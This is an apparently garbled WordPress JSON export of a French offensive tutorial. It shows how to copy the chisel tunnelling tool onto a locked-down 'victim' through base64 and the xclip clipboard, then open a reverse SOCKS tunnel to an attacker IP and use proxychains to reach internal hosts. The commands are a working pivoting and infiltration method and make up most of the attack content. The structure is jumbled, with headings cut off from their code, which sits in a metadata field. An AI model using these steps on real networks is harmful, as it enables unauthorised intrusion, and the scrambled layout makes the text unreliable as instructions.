La victime a limit\u00e9 au minimum le nombre de logiciels disponibles pour qu’il soit particuli\u00e8rement difficile pour un attaquant d’obtenir le compte de l’administrateur ou encore d’exfiltrer de l’information. Donc, les utitaires scp, nc, ncat, netcat, ftp smbclient, bash ne sont pas disponibles. Il existe une m\u00e9thode peu connue pour copier un fichier si vous utilisez kali et une sessionX et qu’aucun utilitaire n’est offert. Le principale est simple, vous envoyer le fichier par le terminal , caract\u00e8re par caract\u00e8re! Pas manuellement, mais avec l’utilitaire xclip. Voici comment proc\u00e9der.<\/p>\n
apt install xclip<\/p>\n
xclip permet de copier un fichier en utilisant le clipboard du serveur X<\/p>\n
pour se faire, vous encodez le fichier au format base64 et le copier dans le clipboard<\/p>\n
Sur la victime Dans le fichier \/etc\/proxychains.conf de l’attaquant Sur l’attaquant Sur la victime On peut maintenant acc\u00e9der aux r\u00e9seaux disponibles sur la victime en utilisant notre proxy sur le port 1080<\/p>\n proxychains curl 192.168.3.22:3386 -v<\/p>\n","protected":false},"excerpt":{"rendered":" La victime a limit\u00e9 au minimum le nombre de logiciels disponibles pour qu’il soit particuli\u00e8rement difficile pour un attaquant d’obtenir le compte de l’administrateur ou encore d’exfiltrer de l’information. Donc, les utitaires scp, nc, ncat, netcat, ftp smbclient, bash ne sont pas disponibles. Il existe une m\u00e9thode peu connue pour copier un fichier si vous utilisez kali et une sessionX et qu’aucun utilitaire n’est offert. Le principale est simple, vous envoyer le fichier par le terminal , caract\u00e8re par caract\u00e8re! Pas manuellement, mais avec l’utilitaire xclip. Voici comment proc\u00e9der. apt install xclip xclip permet de copier un fichier en utilisant <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[27],"yoast_head":"\ncat chisel | base64 -w500 | xclip -sel o #sur l'ordinateur de l'attaquant (XServer). ceci permettra de copier chisel (ou un autre fichier) sur la vitime pour infiltrer le r\u00e9seau<\/code><\/p>\n
\ncat << EOF > chisel.base64\n#ici on utilise les touches SHIFT+INSERT ou le bonton droit de la souris et Paste Selection\n#on attend que le clipboard soit totalement affich\u00e9...\nEOF\n\ncat chisel.base64 | base64 -d > chisel\nchmod +x chisel<\/code><\/pre><\/p>\n
\n[ProxyList]\nsocks5 127.0.0.1 1080<\/code><\/pre><\/p>\n
\nsudo .\/chisel server -p 8000 --reverse<\/code><\/p>\n
\n.\/chisel client 10.9.0.24:8000 R:socks<\/code><\/p>\n